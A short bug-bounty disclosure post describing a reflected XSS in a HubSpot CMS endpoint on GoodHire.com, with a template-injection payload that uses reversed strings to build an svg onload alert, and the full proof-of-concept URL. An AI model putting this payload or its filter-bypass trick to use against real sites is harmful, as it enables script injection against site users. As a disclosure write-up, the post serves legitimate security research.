Feb 17, 2019

Reflected XSS in GoodHire.com CMS

Advertisement






Program : inflection
Bug Type : Reflected XSS
Severity : High 
Domain : GoodHire.com
Bounty : 0$ + Bouns 150$

******************************
Affected Parameter was in HubSpot CMS
referrerUrl
Affected Path 
/_hcms/cta

**********************************
Payload
{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


**********************************
Poc was : 
https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


***********************************
More about this Bug please visit my write up 






****************************************
Share This
Previous Post
Next Post

Security Researcher at Many Websites - Bug Hunter - Civil Engineer Student

1 comment: